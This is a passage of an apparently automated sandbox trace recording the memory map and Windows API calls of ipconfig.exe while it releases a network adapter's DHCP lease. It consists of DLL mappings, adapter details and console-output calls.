"c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2802 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2803 start_va = 0x749e0000 end_va = 0x749e6fff monitored = 0 entry_point = 0x749e1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2804 start_va = 0x6ef30000 end_va = 0x6efb3fff monitored = 0 entry_point = 0x6ef56530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2805 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2806 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2807 start_va = 0x6e460000 end_va = 0x6e473fff monitored = 0 entry_point = 0x6e463c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2808 start_va = 0x6eec0000 end_va = 0x6eed2fff monitored = 0 entry_point = 0x6eec25d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2809 start_va = 0x510000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2810 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2811 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2812 start_va = 0x7f0000 end_va = 0xb26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2813 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2814 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2815 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ipconfig.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ipconfig.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ipconfig.exe.mui") Thread: id = 191 os_tid = 0x1384 [0283.808] GetModuleHandleA (lpModuleName=0x0) returned 0x12a0000 [0283.808] __set_app_type (_Type=0x1) [0283.808] __p__fmode () returned 0x74ac4d6c [0283.808] __p__commode () returned 0x74ac5b1c [0283.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a54b0) returned 0x0 [0283.809] __wgetmainargs (in: _Argc=0x12a6028, _Argv=0x12a602c, _Env=0x12a6030, _DoWildCard=0, _StartInfo=0x12a603c | out: _Argc=0x12a6028, _Argv=0x12a602c, _Env=0x12a6030) returned 0 [0283.809] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0283.809] setlocale (category=0, locale="") returned="English_United States.1252" [0283.812] SetThreadUILanguage (LangId=0x0) returned 0x409 [0283.826] __iob_func () returned 0x74ac1208 [0283.826] _fileno (_File=0x74ac1228) returned 1 [0283.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0283.826] GetFileType (hFile=0x3c) returned 0x2 [0283.826] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfec4 | out: lpMode=0xdfec4) returned 1 [0283.826] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="debug", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.863] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="allcompartments", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.863] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="all", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="flushdns", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="registerdns", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="displaydns", cchCount1=-1, lpString2="release", cchCount2=-1) returned 1 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="renew", cchCount1=-1, lpString2="release", cchCount2=-1) returned 3 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="renew6", cchCount1=-1, lpString2="release", cchCount2=-1) returned 3 [0283.864] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="release", cchCount1=-1, lpString2="release", cchCount2=-1) returned 2 [0283.864] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfea8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfea0 | out: pSid=0xdfea0*=0x6f7918*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0283.864] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6f7918*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfea4 | out: IsMember=0xdfea4) returned 1 [0283.864] __iob_func () returned 0x74ac1208 [0283.864] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0xdfed4, nSize=0x0, Arguments=0xdfed0 | out: lpBuffer="溰o\\r䤓Īረ璬✐") returned 0x1e [0284.122] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0284.122] _fileno (_File=0x74ac1228) returned 1 [0284.123] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.123] GetFileType (hFile=0x3c) returned 0x2 [0284.123] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfea0 | out: lpMode=0xdfea0) returned 1 [0284.123] _fileno (_File=0x74ac1228) returned 1 [0284.124] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0284.124] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfe00, nSize=0x50 | out: lpBuffer="") returned 0x0 [0284.124] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 30 [0284.140] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0284.140] _fileno (_File=0x74ac1228) returned 1 [0284.140] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0284.140] LocalFree (hMem=0x6f6eb0) returned 0x0 [0284.141] LoadLibraryExW (lpLibFileName="dhcpcsvc.dll", hFile=0x0, dwFlags=0x0) returned 0x6e460000 [0284.141] GetProcAddress (hModule=0x6e460000, lpProcName="DhcpIsEnabled") returned 0x6e463250 [0284.141] GetAdaptersAddresses (in: Family=0x2, Flags=0xf, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xdfec8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xdfec8*=0x434) returned 0x6f [0284.157] LocalAlloc (uFlags=0x40, uBytes=0x434) returned 0x704008 [0284.157] GetAdaptersAddresses (in: Family=0x2, Flags=0xf, Reserved=0x0, AdapterAddresses=0x704008, SizePointer=0xdfec8*=0x434 | out: AdapterAddresses=0x704008*(Alignment=0x500000178, Length=0x178, IfIndex=0x5, Next=0x704224, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0xc, [2]=0x21, [3]=0x4e, [4]=0x3e, [5]=0xcb, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x704180*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0xdfec8*=0x434) returned 0x0 [0284.167] ConvertInterfaceLuidToNameW (in: InterfaceLuid=0x7040b8, InterfaceName=0xdfe88, Length=0x20 | out: InterfaceName="ethernet_32768") returned 0x0 [0284.167] DhcpIsEnabled () returned 0x0 [0284.168] DhcpReleaseParameters () returned 0x0 [0284.491] LocalFree (hMem=0x704008) returned 0x0 [0284.491] FreeLibrary (hLibModule=0x6e460000) returned 1 [0284.491] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xdfecc*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xdfecc*=0x918) returned 0x6f [0286.436] LocalAlloc (uFlags=0x40, uBytes=0x918) returned 0x705e58 [0286.436] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x705e58, SizePointer=0xdfecc*=0x918 | out: AdapterAddresses=0x705e58*(Alignment=0x500000178, Length=0x178, IfIndex=0x5, Next=0x70614c, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x706064, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x7060b0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0xc, [2]=0x21, [3]=0x4e, [4]=0x3e, [5]=0xcb, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x0, Dhcpv4Server.iSockaddrLength=0, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0xdfecc*=0x918) returned 0x0 [0287.069] __iob_func () returned 0x74ac1208 [0287.069] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="㐰oﺸ\r㫒Īረ璬❘") returned 0x20 [0287.069] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0287.069] _fileno (_File=0x74ac1228) returned 1 [0287.069] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.069] GetFileType (hFile=0x3c) returned 0x2 [0287.069] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0287.099] _fileno (_File=0x74ac1228) returned 1 [0287.099] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0287.099] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0287.099] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 32 [0287.116] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0287.116] _fileno (_File=0x74ac1228) returned 1 [0287.116] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0287.116] LocalFree (hMem=0x6f3430) returned 0x0 [0287.116] __iob_func () returned 0x74ac1208 [0287.116] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="䀈pﺸ\r㫷Īረ璬❾") returned 0x29 [0287.116] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0287.116] _fileno (_File=0x74ac1228) returned 1 [0287.116] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.116] GetFileType (hFile=0x3c) returned 0x2 [0287.116] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0287.117] _fileno (_File=0x74ac1228) returned 1 [0287.117] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0287.117] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0287.117] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 41 [0289.392] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0289.392] _fileno (_File=0x74ac1228) returned 1 [0289.392] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0289.392] LocalFree (hMem=0x704008) returned 0x0 [0289.392] RtlIpv6AddressToStringExW () returned 0x0 [0289.392] __iob_func () returned 0x74ac1208 [0289.392] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0xdfcbc, nSize=0x0, Arguments=0xdfcb8 | out: lpBuffer="䀈pﺸ\r㵽Īረ璬⥪") returned 0x44 [0289.393] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0289.393] _fileno (_File=0x74ac1228) returned 1 [0289.393] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.393] GetFileType (hFile=0x3c) returned 0x2 [0289.393] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc88 | out: lpMode=0xdfc88) returned 1 [0289.481] _fileno (_File=0x74ac1228) returned 1 [0289.481] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0289.481] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbe8, nSize=0x50 | out: lpBuffer="") returned 0x0 [0289.481] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 68 [0291.522] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.522] _fileno (_File=0x74ac1228) returned 1 [0291.522] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.522] LocalFree (hMem=0x704008) returned 0x0 [0291.522] __iob_func () returned 0x74ac1208 [0291.522] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="䀈pﺸ\r㺳Īረ璬➍") returned 0x29 [0291.522] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.522] _fileno (_File=0x74ac1228) returned 1 [0291.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.522] GetFileType (hFile=0x3c) returned 0x2 [0291.522] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0291.581] _fileno (_File=0x74ac1228) returned 1 [0291.581] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.581] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.581] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 41 [0291.771] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.771] _fileno (_File=0x74ac1228) returned 1 [0291.771] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.771] LocalFree (hMem=0x704008) returned 0x0 [0291.771] __iob_func () returned 0x74ac1208 [0291.771] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="㐰oﺸ\r㫒Īረ璬❞") returned 0x2e [0291.771] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.771] _fileno (_File=0x74ac1228) returned 1 [0291.771] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.771] GetFileType (hFile=0x3c) returned 0x2 [0291.771] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0291.772] _fileno (_File=0x74ac1228) returned 1 [0291.772] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.772] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.772] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 46 [0291.797] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.797] _fileno (_File=0x74ac1228) returned 1 [0291.797] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.797] LocalFree (hMem=0x6f3430) returned 0x0 [0291.797] __iob_func () returned 0x74ac1208 [0291.797] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="䀈pﺸ\r㫷Īረ璬❾") returned 0x29 [0291.797] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.797] _fileno (_File=0x74ac1228) returned 1 [0291.797] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.797] GetFileType (hFile=0x3c) returned 0x2 [0291.797] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0291.798] _fileno (_File=0x74ac1228) returned 1 [0291.798] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.798] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 41 [0291.812] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.813] _fileno (_File=0x74ac1228) returned 1 [0291.813] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.813] LocalFree (hMem=0x704008) returned 0x0 [0291.813] RtlIpv6AddressToStringExW () returned 0x0 [0291.813] __iob_func () returned 0x74ac1208 [0291.813] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296b, dwLanguageId=0x0, lpBuffer=0xdfcbc, nSize=0x0, Arguments=0xdfcb8 | out: lpBuffer="䀈pﺸ\r㵽Īረ璬⥫") returned 0x4d [0291.813] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.813] _fileno (_File=0x74ac1228) returned 1 [0291.813] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.813] GetFileType (hFile=0x3c) returned 0x2 [0291.813] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc88 | out: lpMode=0xdfc88) returned 1 [0291.813] _fileno (_File=0x74ac1228) returned 1 [0291.813] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.813] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbe8, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.813] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 77 [0291.842] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.842] _fileno (_File=0x74ac1228) returned 1 [0291.842] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.842] LocalFree (hMem=0x704008) returned 0x0 [0291.842] RtlIpv6AddressToStringExW () returned 0x0 [0291.842] __iob_func () returned 0x74ac1208 [0291.842] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0xdfcbc, nSize=0x0, Arguments=0xdfcb8 | out: lpBuffer="䀈pﺸ\r㵽Īረ璬⥪") returned 0x44 [0291.842] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.842] _fileno (_File=0x74ac1228) returned 1 [0291.842] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.842] GetFileType (hFile=0x3c) returned 0x2 [0291.842] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc88 | out: lpMode=0xdfc88) returned 1 [0291.843] _fileno (_File=0x74ac1228) returned 1 [0291.843] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.843] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbe8, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.843] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 68 [0291.880] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.880] _fileno (_File=0x74ac1228) returned 1 [0291.880] _setmode (_FileHandle=1, _Mode=16384) returned 65536 [0291.880] LocalFree (hMem=0x704008) returned 0x0 [0291.880] RtlIpv6AddressToStringExW () returned 0x0 [0291.880] __iob_func () returned 0x74ac1208 [0291.880] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0xdfcc0, nSize=0x0, Arguments=0xdfcbc | out: lpBuffer="䀈pﺸ\r㺉Īረ璬➍") returned 0x2b [0291.880] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.880] _fileno (_File=0x74ac1228) returned 1 [0291.880] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.880] GetFileType (hFile=0x3c) returned 0x2 [0291.880] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfc8c | out: lpMode=0xdfc8c) returned 1 [0291.881] _fileno (_File=0x74ac1228) returned 1 [0291.881] _setmode (_FileHandle=1, _Mode=131072) returned 16384 [0291.881] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfbec, nSize=0x50 | out: lpBuffer="") returned 0x0 [0291.881] fwprintf (in: _Stream=0x74ac1228, _Format="%ls" | out: _Stream=0x74ac1228) returned 43 [0291.897] fflush (in: _File=0x74ac1228 | out: _File=0x74ac1228) returned 0 [0291.897] _fileno (_File=0x74ac1228) returned 1 [0291.897] _setmode (_FileHandle=1, _Mode=16384) 